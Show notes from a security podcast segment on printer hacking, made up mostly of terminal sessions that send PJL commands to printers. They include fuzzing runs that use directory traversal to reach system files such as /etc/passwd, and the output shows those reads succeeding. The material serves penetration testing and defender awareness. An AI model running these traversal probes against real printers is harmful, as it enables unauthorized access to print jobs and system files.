Paul’s Printer Hacking Adventures – Paul’s Security Weekly #525

August 15, 2017

Printer attacks have been around for some time. Paul describes some of the latest techniques and research into printer hacking, including capturing print jobs, manipulating print jobs and other attacks. These are useful on penetration tests (believe it or not). Defenders take note, printers must be on your radar.

Run PJL Commands:

printer:/> site @PJL INFO STATUS
CODE=10001
DISPLAY="Ready"
ONLINE=TRUE
Debug mode shows you the underlying commands, very useful for learning more PJL and PS attacks:
192.168.1.197:/> debug
192.168.1.197:/> Debug mode on

192.168.1.197:/> ls
192.168.1.197:/> @PJL FSDIRLIST NAME="0:/" ENTRY=1 COUNT=65535
No data received.
Some printers just don't have a filesystem:
printer:/> ls
No data received.
printer:/> ls ../..
No data received.
printer:/> info filesys
"?"
The "?" means there is no filesystem inside the firmware, according to the PJL documentation. And yes, I read the PJL documentation, it was awesome, you should read it too! #RTFMFTW You can't launch many "actual" attacks unless there is a file system, e.g. capturing print jobs. You can test for the precense of volumes like this:
printer:/> info filesys
VOLUME   TOTAL SIZE     FREE SPACE    LOCATION LABEL    STATUS
0:            67092416Kbytes  67085856Kbytes    		    READ-WRITE
You can also use the fuzz command:
printer:/> fuzz path
Checking base pathes first.
PATH                                                     EXISTS  DIRLIST
────────────────────────────────────────────────────────────────────────
0:/                                                      True    True   
Listing directory.
d        -   PJL
d        -   PostScript
d        -   saveDevice
d        -   webServer
PJL Error: Vol name out of range
PJL Error: Vol name out of range
                                                         False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
.                                                        False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
                                                        False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
/                                                        False   False  
You can also fuzz for file names:
printer:/> fuzz blind
Blindly trying to read files.
PATH                                                     GET     EXISTS 
────────────────────────────────────────────────────────────────────────
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%win.ini                                         False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%repairsam                                      False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%repairsystem                                   False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%system32configsystem.sav                      False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%System32driversetchosts                      False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%SYSTEMDRIVE%boot.ini                                   False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%USERPROFILE%ntuser.dat                                 False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%SYSTEMDRIVE%pagefile.sys                               False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%SYSTEMROOT%repairsam                                  False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%SYSTEMROOT%repairsystem                               False   False  
────────────────────────────────────────────────────────────────────────
PJL Error: File not found
PJL Error: File not found
0:/.profile                                              False   False  
PJL Error: File not found
PJL Error: File not found
0:/../.profile                                           False   False  
0:/../../.profile                                        True    True   
PJL Error: File not found
PJL Error: File not found
0:/.../.profile                                          False   False  
PJL Error: File not found
PJL Error: File not found
0:/.../.../.profile                                      False   False  
PJL Error: File not found
PJL Error: File not found
0:/..../.profile                                         False   False  
PJL Error: File not found
PJL Error: File not found
0:/..../..../.profile                                    False   False  
PJL Error: File not found
PJL Error: File not found
0:/etc/passwd                                            False   False  
PJL Error: File not found
PJL Error: File not found
0:/../etc/passwd                                         False   False  
0:/../../etc/passwd                                      True    True   

Resources

Full Show Notes

Subscribe to YouTube Channel [audio src="http://traffic.libsyn.com/pauldotcom/Pauls_Printer_Hacking_Adventures_-_Pauls_Security_Weekly_525_converted.mp3"]
prestitial ad